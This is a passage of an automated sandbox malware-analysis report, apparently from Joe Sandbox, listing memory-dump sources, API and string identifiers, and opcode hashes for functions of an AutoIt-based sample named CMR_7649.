                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D